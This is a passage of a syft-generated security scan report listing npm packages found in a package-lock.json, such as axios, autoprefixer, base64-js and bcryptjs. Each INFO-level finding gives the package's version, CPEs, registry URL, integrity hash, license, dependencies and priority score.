- cpe: cpe:2.3:a:asynckit:asynckit:0.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/asynckit@0.4.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz
|
|
integrity: sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b5ad0267f42a44eb
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: autoprefixer 10.5.0'
|
|
title: autoprefixer 10.5.0
|
|
description: 'Package discovered: autoprefixer 10.5.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9d0845c4768cfcf5
|
|
name: autoprefixer
|
|
version: 10.5.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:autoprefixer:autoprefixer:10.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/autoprefixer@10.5.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.5.0.tgz
|
|
integrity: sha512-FMhOoZV4+qR6aTUALKX2rEqGG+oyATvwBt9IIzVR5rMa2HRWPkxf+P+PAJLD1I/H5/II+HuZcBJYEFBpq39ong==
|
|
dependencies:
|
|
browserslist: ^4.28.2
|
|
caniuse-lite: ^1.0.30001787
|
|
fraction.js: ^5.3.4
|
|
picocolors: ^1.1.1
|
|
postcss-value-parser: ^4.2.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fba99cf19e7cc071
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: axios 1.15.2'
|
|
title: axios 1.15.2
|
|
description: 'Package discovered: axios 1.15.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 691f5259c0d155d0
|
|
name: axios
|
|
version: 1.15.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:axios:axios:1.15.2:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/axios@1.15.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/axios/-/axios-1.15.2.tgz
|
|
integrity: sha512-wLrXxPtcrPTsNlJmKjkPnNPK2Ihe0hn0wGSaTEiHRPxwjvJwT3hKmXF4dpqxmPO9SoNb2FsYXj/xEo0gHN+D5A==
|
|
dependencies:
|
|
follow-redirects: ^1.15.11
|
|
form-data: ^4.0.5
|
|
proxy-from-env: ^2.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 15b2afab0d6c8b1b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: balanced-match 1.0.2'
|
|
title: balanced-match 1.0.2
|
|
description: 'Package discovered: balanced-match 1.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0d7c80c1e227b7e2
|
|
name: balanced-match
|
|
version: 1.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:balanced-match:balanced-match:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:balanced-match:balanced_match:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:balanced_match:balanced-match:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:balanced_match:balanced_match:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:balanced:balanced-match:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:balanced:balanced_match:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/balanced-match@1.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz
|
|
integrity: sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e3263834d404d719
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: base64-js 0.0.8'
|
|
title: base64-js 0.0.8
|
|
description: 'Package discovered: base64-js 0.0.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b2d621b6dd16cf05
|
|
name: base64-js
|
|
version: 0.0.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:base64-js:base64-js:0.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:base64-js:base64_js:0.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:base64_js:base64-js:0.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:base64_js:base64_js:0.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:base64:base64-js:0.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:base64:base64_js:0.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/base64-js@0.0.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/base64-js/-/base64-js-0.0.8.tgz
|
|
integrity: sha512-3XSA2cR/h/73EzlXXdU6YNycmYI7+kicTxks4eJg2g39biHR84slg2+des+p7iHYhbRg/udIS4TD53WabcOUkw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 277066fc01f56c50
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: base64-js 1.5.1'
|
|
title: base64-js 1.5.1
|
|
description: 'Package discovered: base64-js 1.5.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c7ab39b9720e240f
|
|
name: base64-js
|
|
version: 1.5.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:base64-js:base64-js:1.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:base64-js:base64_js:1.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:base64_js:base64-js:1.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:base64_js:base64_js:1.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:base64:base64-js:1.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:base64:base64_js:1.5.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/base64-js@1.5.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz
|
|
integrity: sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d8b667ce3a0cff7b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: base64id 2.0.0'
|
|
title: base64id 2.0.0
|
|
description: 'Package discovered: base64id 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 224462b6727019f7
|
|
name: base64id
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:base64id:base64id:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/base64id@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/base64id/-/base64id-2.0.0.tgz
|
|
integrity: sha512-lGe34o6EHj9y3Kts9R4ZYs/Gr+6N7MCaMlIFA3F1R2O5/m7K06AxfSeO5530PEERE6/WyEg3lsuyw4GHlPZHog==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b03c61c0d46ca441
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: baseline-browser-mapping 2.10.24'
|
|
title: baseline-browser-mapping 2.10.24
|
|
description: 'Package discovered: baseline-browser-mapping 2.10.24'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 013c8659dba6bad8
|
|
name: baseline-browser-mapping
|
|
version: 2.10.24
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:baseline-browser-mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:baseline-browser-mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:baseline_browser_mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:baseline_browser_mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:baseline-browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:baseline-browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:baseline_browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:baseline_browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:baseline:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:baseline:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/baseline-browser-mapping@2.10.24
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/baseline-browser-mapping/-/baseline-browser-mapping-2.10.24.tgz
|
|
integrity: sha512-I2NkZOOrj2XuguvWCK6OVh9GavsNjZjK908Rq3mIBK25+GD8vPX5w2WdxVqnQ7xx3SrZJiCiZFu+/Oz50oSYSA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 83b4bdfed9e1341d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: basic-auth 2.0.1'
|
|
title: basic-auth 2.0.1
|
|
description: 'Package discovered: basic-auth 2.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3e5df9b4f6b62db4
|
|
name: basic-auth
|
|
version: 2.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:basic-auth:basic-auth:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:basic-auth:basic_auth:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:basic_auth:basic-auth:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:basic_auth:basic_auth:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:basic:basic-auth:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:basic:basic_auth:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/basic-auth@2.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz
|
|
integrity: sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg==
|
|
dependencies:
|
|
safe-buffer: 5.1.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 673442d13a9240b9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: bcryptjs 2.4.3'
|
|
title: bcryptjs 2.4.3
|
|
description: 'Package discovered: bcryptjs 2.4.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 06243f2e41cd3912
|
|
name: bcryptjs
|
|
version: 2.4.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:bcryptjs:bcryptjs:2.4.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/bcryptjs@2.4.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/bcryptjs/-/bcryptjs-2.4.3.tgz
|
|
integrity: sha512-V/Hy/X9Vt7f3BbPJEi8BdVFMByHi+jNXrYkW3huaybV/kQ0KJg0Y6PkEMbn+zeT+i+SiKZ/HMqJGIIt4LZDqNQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b36a32eeee7b64f7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: bidi-js 1.0.3'
|
|
title: bidi-js 1.0.3
|
|
description: 'Package discovered: bidi-js 1.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 983a70fcd42b01da
|
|
name: bidi-js
|
|
version: 1.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:bidi-js:bidi-js:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:bidi-js:bidi_js:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:bidi_js:bidi-js:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:bidi_js:bidi_js:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:bidi:bidi-js:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:bidi:bidi_js:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/bidi-js@1.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/bidi-js/-/bidi-js-1.0.3.tgz
|
|
integrity: sha512-RKshQI1R3YQ+n9YJz2QQ147P66ELpa1FQEg20Dk8oW9t2KgLbpDLLp9aGZ7y8WHSshDknG0bknqGw5/tyCs5tw==
|
|
dependencies:
|
|
require-from-string: ^2.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2fa656db5288bebd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: bignumber.js 9.3.1'
|
|
title: bignumber.js 9.3.1
|
|
description: 'Package discovered: bignumber.js 9.3.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0debd0f90c403668
|
|
name: bignumber.js
|
|
version: 9.3.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:bignumber.js:bignumber.js:9.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/bignumber.js@9.3.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/bignumber.js/-/bignumber.js-9.3.1.tgz
|
|
integrity: sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7dd5ae9dd664c020
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: binary-extensions 2.3.0'
|
|
title: binary-extensions 2.3.0
|
|
description: 'Package discovered: binary-extensions 2.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a472eb11fead94f4
|
|
name: binary-extensions
|
|
version: 2.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
